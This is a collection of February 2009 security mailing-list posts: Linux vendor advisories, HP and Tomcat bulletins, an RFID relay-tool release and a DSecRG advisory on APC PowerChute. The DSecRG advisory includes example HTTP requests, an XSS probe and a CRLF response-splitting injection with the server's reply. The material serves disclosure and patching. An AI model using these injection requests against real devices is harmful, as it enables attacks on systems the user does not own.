Re: [DSECRG-09-009] APC PowerChute Network Shutdown's Web Interface - XSS vulnerability
On 2009-02-26 Vladimir '3APA3A' Dubrovin wrote: > --Thursday, February 26, 2009, 7:40:50 PM, you wrote to > bugtraq@securityfocus.com: > DSRG> Application: APC PowerChute Network Shutdown's Web Interface > DSRG> Vendor URL:http://www.apc.com/ > DSRG> Bug: XSS/Response Splitting > > DSRG> Solution: Use Firewall > > Just wonder: how can firewall to protect against XSS/response splitting? You don't give the bad guys access to your UPS's web interface? Regards Ansgar Wiechers -- "The Mac OS X kernel should never panic because, when it does, it seriously inconveniences the user." --http://developer.apple.com/technotes/tn2004/tn2118.html
Re: New site about security conferences : www.security-briefings.com
Please plan to join us for our 2009 Techno Security Conference in beautiful Myrtle Beach, SC. May 31 - June 3 at the Marriott Grande Dunes Resort. Our Eleventh Annual International Techno Security Conference, promises to be THE international meeting place for IT Security professionals from around the world. We also have some great pre-conference and post-conference training from some of leading companies in training. To learn more go to our website http://www.thetrainingco.com/
ANNOUNCE: RFIDIOt-0.1x release - February 2009
Hi All, Well, it's been a busy month... thanks to pytey, I came across TikiTags, which proved to be rather more interesting than they at first seemed... http://hackerati.com/post/57314994/rfid-on-the-cheap-hacking-tikitag These devices contain an NXP PN532 reader chip, which, it turns out, is also capable of running in emulator mode (it is the chip used in a lot of NFC mobile phones), and, after looking at documentation from NXP, I was able to get this functionality working, and I'm delighted that NXP have also agreed to allow me to release the code despite it being based on information that was provided under NDA, so massive props to NXP for supporting the open source security research community! :) As a result, I'm able to release two new tools: pn532emulate.py - sets up the emulator and processes one command. pn532mitm.py - 'pn532 man-in-the-middle', which will drive two readers: one as an emulator and one as a reader, and will log all traffic that flows between them. Additionally, you can separate the reader and emulator onto two different machines, and relay the traffic via TCP. As always, this is very much a work in progress, and I know the error handling is not perfect and needs tweaking. Low level command processing is also slightly wacky, and will probably be re-written now I understand what's going on a bit more... :) I've also added a tool for reading HID ProxCard IDs - 'hidprox.py' and I finally got around to writing some more detailed documentation, which you can find here: http://www.rfidiot.org/documentation.html Homepage and download instructions etc. can be found here: http://www.rfidiot.org/ Enjoy! Adam -- Adam Laurie Tel: +44 (0) 20 7993 2690 Suite 117 Fax: +44 (0) 1308 867 949 61 Victoria Road Surbiton Surrey mailto:a...@algroup.co.uk KT6 4JX http://rfidiot.org
[ MDVSA-2009:056 ] net-snmp
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:056 http://www.mandriva.com/security/ ___ Package : net-snmp Date: February 25, 2009 Affected: 2009.0 ___ Problem Description: A vulnerability has been identified and corrected in net-snmp: The netsnmp_udp_fmtaddr function (snmplib/snmpUDPDomain.c) in net-snmp 5.0.9 through 5.4.2, when using TCP wrappers for client authorization, does not properly parse hosts.allow rules, which allows remote attackers to bypass intended access restrictions and execute SNMP queries, related to source/destination IP address confusion. (CVE-2008-6123) The updated packages have been patched to prevent this. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6123 ___ Updated Packages: Mandriva Linux 2009.0: 7b667de5129a9e08b36d805d35cbf060 2009.0/i586/libnet-snmp15-5.4.2-2.2mdv2009.0.i586.rpm 6c151b3d78c5d246ed85b895ba5156d3 2009.0/i586/libnet-snmp-devel-5.4.2-2.2mdv2009.0.i586.rpm 6a72b790faef70202bd1f621d3a1bee4 2009.0/i586/libnet-snmp-static-devel-5.4.2-2.2mdv2009.0.i586.rpm b13546014a62f1b769301e3c4d81e212 2009.0/i586/net-snmp-5.4.2-2.2mdv2009.0.i586.rpm 6a1b4a23390aa6ccb08aa10159e84c75 2009.0/i586/net-snmp-mibs-5.4.2-2.2mdv2009.0.i586.rpm 3a685061ed4b5d88807a0a41057cc4fc 2009.0/i586/net-snmp-tkmib-5.4.2-2.2mdv2009.0.i586.rpm af6a207a925a66c499728e2a636e4f10 2009.0/i586/net-snmp-trapd-5.4.2-2.2mdv2009.0.i586.rpm ad9a815a618a83c09c34dd2c6b0f0722 2009.0/i586/net-snmp-utils-5.4.2-2.2mdv2009.0.i586.rpm 4bd012033253d9f07c1b09c014af1d28 2009.0/i586/perl-NetSNMP-5.4.2-2.2mdv2009.0.i586.rpm 9a66514b5c275e034957e187730f502d 2009.0/SRPMS/net-snmp-5.4.2-2.2mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 3afaf4fd7163993c13a9d2aae802e300 2009.0/x86_64/lib64net-snmp15-5.4.2-2.2mdv2009.0.x86_64.rpm 7b0220b95b4489bbf4e7f5dcce41c19b 2009.0/x86_64/lib64net-snmp-devel-5.4.2-2.2mdv2009.0.x86_64.rpm 149370affda026d32bf857b59ef67d77 2009.0/x86_64/lib64net-snmp-static-devel-5.4.2-2.2mdv2009.0.x86_64.rpm 3807127a87ecc25f0039dfde2779cd57 2009.0/x86_64/net-snmp-5.4.2-2.2mdv2009.0.x86_64.rpm 34a8c8cba34e4f3d6442d42f87f37d3a 2009.0/x86_64/net-snmp-mibs-5.4.2-2.2mdv2009.0.x86_64.rpm a213806e75a50d5cee646a20f85e60d4 2009.0/x86_64/net-snmp-tkmib-5.4.2-2.2mdv2009.0.x86_64.rpm 6b4a5a30800a1aa6553a665846d7f3a6 2009.0/x86_64/net-snmp-trapd-5.4.2-2.2mdv2009.0.x86_64.rpm 586c0064a0cff39fa1a44be87da1e3f5 2009.0/x86_64/net-snmp-utils-5.4.2-2.2mdv2009.0.x86_64.rpm dc4b52e9910de9710c91aaecbae2794b 2009.0/x86_64/perl-NetSNMP-5.4.2-2.2mdv2009.0.x86_64.rpm 9a66514b5c275e034957e187730f502d 2009.0/SRPMS/net-snmp-5.4.2-2.2mdv2009.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJpcehmqjQ0CJFipgRAtPFAJ9mfqal0TdNGtVMBlaFw/7graHNwACfXjQ7 hh38u4gHmrC7lK40UlsOoSE= =8VY2 -END PGP SIGNATURE-
BitDefender Internet Security XSS
Application: BitDefender Internet Security 2009 OS: Windows Xp (All patches a day) -- 1 - Description 2 - Vulnerability 3 - POC/EXPLOIT -- Description BitDefender Internet Security is a security software that includes multiples protections, for example (anti spam, anti spyware,etc). -- Vulnerability The vulnerability is caused because when you scans a file, the antivirus used a flash for display the name of file, with this you can make a malformed rar or zip that containing a script. and when the av scans the file, run the script. -- POC/EXPLOIT The poc is the video because for make the poc you need a virus file. the xss is this http://video.google.com/videoplay?docid=-8346357281340486654 -- Juan Pablo Lopez Yacubian
Re: [DSECRG-09-009] APC PowerChute Network Shutdown's Web Interface - XSS vulnerability
Dear Digital Security Research Group, --Thursday, February 26, 2009, 7:40:50 PM, you wrote to bugtraq@securityfocus.com: DSRG> Application:APC PowerChute Network Shutdown's Web Interface DSRG> Vendor URL: http://www.apc.com/ DSRG> Bug:XSS/Response Splitting DSRG> Solution: Use Firewall Just wonder: how can firewall to protect against XSS/response splitting? -- Skype: Vladimir.Dubrovin ~/ZARAZA http://securityvulns.com/
[ MDVSA-2009:026-1 ] phpMyAdmin
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:026-1 http://www.mandriva.com/security/ ___ Package : phpMyAdmin Date: February 26, 2009 Affected: Corporate 4.0 ___ Problem Description: Cross-site scripting (XSS) vulnerability in pmd_pdf.php allows remote attackers to inject arbitrary web script or HTML by using db script parameter when register_global php parameter is enabled (CVE-2008-4775). Cross-site request forgery (CSRF) vulnerability in tbl_structure.php allows remote attackers perform SQL injection and execute arbitrary code by using table script parameter (CVE-2008-5621). Multiple cross-site request forgery (CSRF) vulnerabilities in allows remote attackers perform SQL injection by using unknown vectors related to table script parameter (CVE-2008-5622). This update provide the fix for these security issues. Update: The previous update packages wasn't signed, this time they are. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4775 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5621 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5622 ___ Updated Packages: Corporate 4.0: 7ea694ed2ea2614175a95caa01f24cb4 corporate/4.0/i586/phpMyAdmin-2.11.9.4-0.2.20060mlcs4.noarch.rpm b0a1279e3623d5b6d2afef8dc2c69352 corporate/4.0/SRPMS/phpMyAdmin-2.11.9.4-0.2.20060mlcs4.src.rpm Corporate 4.0/X86_64: 097bac4c6546ea1574c0c29bea0bde0f corporate/4.0/x86_64/phpMyAdmin-2.11.9.4-0.2.20060mlcs4.noarch.rpm b0a1279e3623d5b6d2afef8dc2c69352 corporate/4.0/SRPMS/phpMyAdmin-2.11.9.4-0.2.20060mlcs4.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJpqZqmqjQ0CJFipgRAsCdAJ9/UksEMPGasTmn0HdzgA31BuqXFgCdEBy2 1zLWPIMCKYmOJkc4EomrERk= =OX1k -END PGP SIGNATURE-
[ MDVSA-2009:048-2 ] epiphany
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:048-2 http://www.mandriva.com/security/ ___ Package : epiphany Date: February 25, 2009 Affected: 2008.1 ___ Problem Description: Python has a variable called sys.path that contains all paths where Python loads modules by using import scripting procedure. A wrong handling of that variable enables local attackers to execute arbitrary code via Python scripting in the current Epiphany working directory (CVE-2008-5985). This update provides fix for that vulnerability. Update: The previous update package was not built against the correct (latest) libxulrunner-1.9.0.6 library (fixes #48163) ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5985 ___ Updated Packages: Mandriva Linux 2008.1: a93951cb851094952d151e3da49d6212 2008.1/i586/epiphany-2.22.3-0.3mdv2008.1.i586.rpm b5e6b0322dbad813e3285dc4d8efab6e 2008.1/i586/epiphany-devel-2.22.3-0.3mdv2008.1.i586.rpm c605be70a70b503027c9d1f5da3305c4 2008.1/SRPMS/epiphany-2.22.3-0.3mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 06731986f1f534739d2421ebc94e4714 2008.1/x86_64/epiphany-2.22.3-0.3mdv2008.1.x86_64.rpm a98351efcc10e336e5e6b78caa4697b8 2008.1/x86_64/epiphany-devel-2.22.3-0.3mdv2008.1.x86_64.rpm c605be70a70b503027c9d1f5da3305c4 2008.1/SRPMS/epiphany-2.22.3-0.3mdv2008.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJpba8mqjQ0CJFipgRAoIKAJkBoRl+TzPbhR2EuFz6PjUDrI1bnwCff7p8 uXWCTIECFqiLpmFy0F9Z4H0= =tjvM -END PGP SIGNATURE-
[ MDVSA-2009:057 ] valgrind
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:057 http://www.mandriva.com/security/ ___ Package : valgrind Date: February 26, 2009 Affected: 2008.0, 2008.1, 2009.0 ___ Problem Description: A vulnerability has been identified and corrected in valgrind: Untrusted search path vulnerability in valgrind before 3.4.0 allows local users to execute arbitrary programs via a Trojan horse .valgrindrc file in the current working directory, as demonstrated using a malicious --db-command options. NOTE: the severity of this issue has been disputed, but CVE is including this issue because execution of a program from an untrusted directory is a common scenario. (CVE-2008-4865) The updated packages have been patched to prevent this. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4865 ___ Updated Packages: Mandriva Linux 2008.0: 7d2fdce148a8c9883262ff3d6b2cf843 2008.0/i586/valgrind-3.2.3-2.2mdv2008.0.i586.rpm a204fd31df3f302c19b8e6c74bd58eb1 2008.0/SRPMS/valgrind-3.2.3-2.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: dfe5025371c9dc804b71e84081a62743 2008.0/x86_64/valgrind-3.2.3-2.2mdv2008.0.x86_64.rpm a204fd31df3f302c19b8e6c74bd58eb1 2008.0/SRPMS/valgrind-3.2.3-2.2mdv2008.0.src.rpm Mandriva Linux 2008.1: c8df0a495d0d70b8dd61900037e2 2008.1/i586/valgrind-3.3.0-3.1mdv2008.1.i586.rpm 391e202fc7f592ba63280a34245bb255 2008.1/SRPMS/valgrind-3.3.0-3.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 2e16854eec6bc05f5a6d39e1fef120be 2008.1/x86_64/valgrind-3.3.0-3.1mdv2008.1.x86_64.rpm 391e202fc7f592ba63280a34245bb255 2008.1/SRPMS/valgrind-3.3.0-3.1mdv2008.1.src.rpm Mandriva Linux 2009.0: c61e803ffafdcfbf889b604dec79fa4e 2009.0/i586/valgrind-3.3.1-2.1mdv2009.0.i586.rpm 49a62badfb184864bd5764f1d3b8280b 2009.0/SRPMS/valgrind-3.3.1-2.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: b0b4fecae9ffd5613c4ebfcb369ba23f 2009.0/x86_64/valgrind-3.3.1-2.1mdv2009.0.x86_64.rpm 49a62badfb184864bd5764f1d3b8280b 2009.0/SRPMS/valgrind-3.3.1-2.1mdv2009.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJpos8mqjQ0CJFipgRArW7AKCD5t24AcyIloyEvYt2XIdj84BnSACg6y47 jVLQtGJ6WmVL1iMqQEPQ8lA= =9zCC -END PGP SIGNATURE-
[security bulletin] HPSBGN02410 SSRT080135 rev.1 - HP Virtual Rooms Client Running on Windows, Remote Execution of Arbitrary Code
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01678405 Version: 1 HPSBGN02410 SSRT080135 rev.1 - HP Virtual Rooms Client Running on Windows, Remote Execution of Arbitrary Code NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2009-02-24 Last Updated: 2009-02-24 Potential Security Impact: Remote execution of arbitrary code Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP Virtual Rooms client running on Windows. The vulnerability could be exploited to allow remote execution of arbitrary code. References: CVE-2009-0208 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Virtual Rooms client v7.0 and earlier running on Windows BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2009-0208 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002. The Hewlett-Packard Company thanks Will Dormann of CERT/CC for reporting this vulnerability to security-al...@hp.com RESOLUTION HP has provided HP Virtual Rooms client v7.0.1 or later to resolve this vulnerability. The upgrade is available from: https://www.rooms.hp.com HP Virtual Rooms client v7.0.1 can be installed by using the "Test your setup" link at https://www.rooms.hp.com . Select "Test your setup" from the right navigation bar and follow the instructions. Note: Installing this new release will also apply the Windows registry kill bit for CLSID {0032-9593-4264-8B29-930B3E4EDCCD}. The kill bit is explained in Microsoft article KB240797 or subsequent. http://support.microsoft.com/kb/240797 . To completely remove HP Virtual rooms (HPVR) from your system: Use the HPVR cleaner to remove HP Virtual Rooms from your system. The HPVR Cleaner will remove all HPVR executables and clear all registry entries without the need to install the new version. Follow the instructions under "Removing HPVR components" here: https://www.rooms.hp.com/resources/ . PRODUCT SPECIFIC INFORMATION None HISTORY Version:1 (rev.1) - 24 February 2009 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-al...@hp.com Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accura
[SECURITY] CVE-2008-4308: Tomcat information disclosure vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2008-4308: Tomcat information disclosure vulnerability Severity: Low Vendor: The Apache Software Foundation Versions Affected: Tomcat 4.1.32 to 4.1.34 Tomcat 5.5.10 to 5.5.20 Tomcat 6.0.x is not affected The unsupported Tomcat 3.x, 4.0.x and 5.0.x versions may be also affected Note: Although this vulnerability affects relatively old versions of Apache Tomcat, it was only discovered and reported to the Apache Tomcat Security team in October 2008. Publication of this issue was then postponed until now at the request of the reporter. Description: Bug 40771 (https://issues.apache.org/bugzilla/show_bug.cgi?id=40771) may result in the disclosure of POSTed content from a previous request. For a vulnerability to exist the content read from the input stream must be disclosed, eg via writing it to the response and committing the response, before the ArrayIndexOutOfBoundsException occurs which will halt processing of the request. Mitigation: Upgrade to: 4.1.35 or later 5.5.21 or later 6.0.0 or later Example: See original bug report for example of how to create the error condition. Credit: This issue was discovered by Fujitsu and reported to the Tomcat Security Team via JPCERT. References: http://tomcat.apache.org/security.html Mark Thomas -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJpdGRb7IeiTPGAkMRAkK+AKC1m5WunqOmwuFYSYEoASF/AokgDQCffmxM U3IdbfYNVtRIzCW5XTvhv2E= =rJGg -END PGP SIGNATURE-
[DSECRG-09-009] APC PowerChute Network Shutdown's Web Interface - XSS vulnerability
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-009 --link to original advisory -- http://www.dsecrg.com/pages/vul/show.php?id=82 Application:APC PowerChute Network Shutdown's Web Interface Vendor URL: http://www.apc.com/ Bug:XSS/Response Splitting Exploits: YES Reported: 20.10.2008 Vendor Response:20.10.2008 Vendor Reference: 081020-000796 Solution: Use Firewall Date of Public Advisory:26.02.2009 Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** Linked XSS and Response Splitting vulnerabilities found in APC PowerChute Network Shutdown's Web Interface. Details *** 1. Linked XSS Vulnerability found in script /security/applet vulnerable parameter - "referrer" Example *** GET /security/applet?referrer=>"'> 2. Response Splitting Vulnerability found in script contexthelp. vulnerable parameter - "page" Example *** GET /contexthelp?page=Foobar?%0d%0aDSECRG_HEADER:testvalue HTTP/1.0 response: HTTP/1.0 302 Moved temporarily Content-Length: 0 Date: Чт, 25 сен 2008 10:47:42 GMT Server: Acme.Serve/v1.7 of 13nov96 Connection: close Expires: 0 Cache-Control: no-cache Content-type: text/html Location: help/english/Foobar? DSECRG_HEADER:testvalue Content-type: text/html Solution http://nam-en.apc.com/cgi-bin/nam_en.cfg/php/enduser/std_adp.php?p_faqid=9539 A low-risk web interface vulnerability has been discovered in the PowerChute Business Edition Shutdown Agent. This issue is scheduled to be addressed in a release of the application. While the severity of this vulnerability has been determined to be minimal, it is recommended that user's continue to ensure the highest level of protection possible through the placement of PowerChute Business Edition behind a firewall. References ** http://nam-en.apc.com/cgi-bin/nam_en.cfg/php/enduser/std_adp.php?p_faqid=9539 About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsecrg [dot] com http://www.dsecrg.com
[USN-724-1] Squid vulnerability
=== Ubuntu Security Notice USN-724-1 February 25, 2009 squid vulnerability CVE-2009-0478 === A security issue affects the following Ubuntu releases: Ubuntu 8.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.10: squid 2.7.STABLE3-1ubuntu2.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Joshua Morin, Mikko Varpiola and Jukka Taimisto discovered that Squid did not properly validate the HTTP version when processing requests. A remote attacker could exploit this to cause a denial of service (assertion failure). Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1.diff.gz Size/MD5: 303042 9132293f589a71ae3f771e1ae6de30f1 http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1.dsc Size/MD5: 1252 6953f88d6f4825daabd9e77bd0fa1a88 http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.7.STABLE3.orig.tar.gz Size/MD5: 1782040 a4d7608696e2b617aa5853c7d23e25b0 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid-common_2.7.STABLE3-1ubuntu2.1_all.deb Size/MD5: 495876 b6d1e76b140c792297c14382a06ed3e3 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_amd64.deb Size/MD5: 771610 7f2ca95b0497cc23f0bf26b7a6503cc7 http://security.ubuntu.com/ubuntu/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_amd64.deb Size/MD5: 119880 27ff06a902debe143acb7b3959fb1c52 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_i386.deb Size/MD5: 695708 312c710ebdb46e3017b02cb672d14524 http://security.ubuntu.com/ubuntu/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_i386.deb Size/MD5: 118638 f2f2f698523d49d8971c7a22faebc427 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_lpia.deb Size/MD5: 694080 6720b3aca93aabb7600a1a2c2f699af5 http://ports.ubuntu.com/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_lpia.deb Size/MD5: 118550 7484981bd7c4c8b6361362e98d5d1631 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_powerpc.deb Size/MD5: 777958 b9d530e92ad4638fb8d169ef55eb33f4 http://ports.ubuntu.com/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_powerpc.deb Size/MD5: 120446 9899cd403bbca3e0e6f5a936cd2d9955 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_sparc.deb Size/MD5: 719088 2781d6fd1c7adc0b76aa12670ac1abb5 http://ports.ubuntu.com/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_sparc.deb Size/MD5: 119398 8a26b4da728c31d7bd11191575b2 signature.asc Description: Digital signature
[ MDVSA-2009:056 ] net-snmp
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:056 http://www.mandriva.com/security/ ___ Package : net-snmp Date: February 25, 2009 Affected: 2009.0 ___ Problem Description: A vulnerability has been identified and corrected in net-snmp: The netsnmp_udp_fmtaddr function (snmplib/snmpUDPDomain.c) in net-snmp 5.0.9 through 5.4.2, when using TCP wrappers for client authorization, does not properly parse hosts.allow rules, which allows remote attackers to bypass intended access restrictions and execute SNMP queries, related to source/destination IP address confusion. (CVE-2008-6123) The updated packages have been patched to prevent this. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6123 ___ Updated Packages: Mandriva Linux 2009.0: 7b667de5129a9e08b36d805d35cbf060 2009.0/i586/libnet-snmp15-5.4.2-2.2mdv2009.0.i586.rpm 6c151b3d78c5d246ed85b895ba5156d3 2009.0/i586/libnet-snmp-devel-5.4.2-2.2mdv2009.0.i586.rpm 6a72b790faef70202bd1f621d3a1bee4 2009.0/i586/libnet-snmp-static-devel-5.4.2-2.2mdv2009.0.i586.rpm b13546014a62f1b769301e3c4d81e212 2009.0/i586/net-snmp-5.4.2-2.2mdv2009.0.i586.rpm 6a1b4a23390aa6ccb08aa10159e84c75 2009.0/i586/net-snmp-mibs-5.4.2-2.2mdv2009.0.i586.rpm 3a685061ed4b5d88807a0a41057cc4fc 2009.0/i586/net-snmp-tkmib-5.4.2-2.2mdv2009.0.i586.rpm af6a207a925a66c499728e2a636e4f10 2009.0/i586/net-snmp-trapd-5.4.2-2.2mdv2009.0.i586.rpm ad9a815a618a83c09c34dd2c6b0f0722 2009.0/i586/net-snmp-utils-5.4.2-2.2mdv2009.0.i586.rpm 4bd012033253d9f07c1b09c014af1d28 2009.0/i586/perl-NetSNMP-5.4.2-2.2mdv2009.0.i586.rpm 9a66514b5c275e034957e187730f502d 2009.0/SRPMS/net-snmp-5.4.2-2.2mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 3afaf4fd7163993c13a9d2aae802e300 2009.0/x86_64/lib64net-snmp15-5.4.2-2.2mdv2009.0.x86_64.rpm 7b0220b95b4489bbf4e7f5dcce41c19b 2009.0/x86_64/lib64net-snmp-devel-5.4.2-2.2mdv2009.0.x86_64.rpm 149370affda026d32bf857b59ef67d77 2009.0/x86_64/lib64net-snmp-static-devel-5.4.2-2.2mdv2009.0.x86_64.rpm 3807127a87ecc25f0039dfde2779cd57 2009.0/x86_64/net-snmp-5.4.2-2.2mdv2009.0.x86_64.rpm 34a8c8cba34e4f3d6442d42f87f37d3a 2009.0/x86_64/net-snmp-mibs-5.4.2-2.2mdv2009.0.x86_64.rpm a213806e75a50d5cee646a20f85e60d4 2009.0/x86_64/net-snmp-tkmib-5.4.2-2.2mdv2009.0.x86_64.rpm 6b4a5a30800a1aa6553a665846d7f3a6 2009.0/x86_64/net-snmp-trapd-5.4.2-2.2mdv2009.0.x86_64.rpm 586c0064a0cff39fa1a44be87da1e3f5 2009.0/x86_64/net-snmp-utils-5.4.2-2.2mdv2009.0.x86_64.rpm dc4b52e9910de9710c91aaecbae2794b 2009.0/x86_64/perl-NetSNMP-5.4.2-2.2mdv2009.0.x86_64.rpm 9a66514b5c275e034957e187730f502d 2009.0/SRPMS/net-snmp-5.4.2-2.2mdv2009.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJpcehmqjQ0CJFipgRAtPFAJ9mfqal0TdNGtVMBlaFw/7graHNwACfXjQ7 hh38u4gHmrC7lK40UlsOoSE= =8VY2 -END PGP 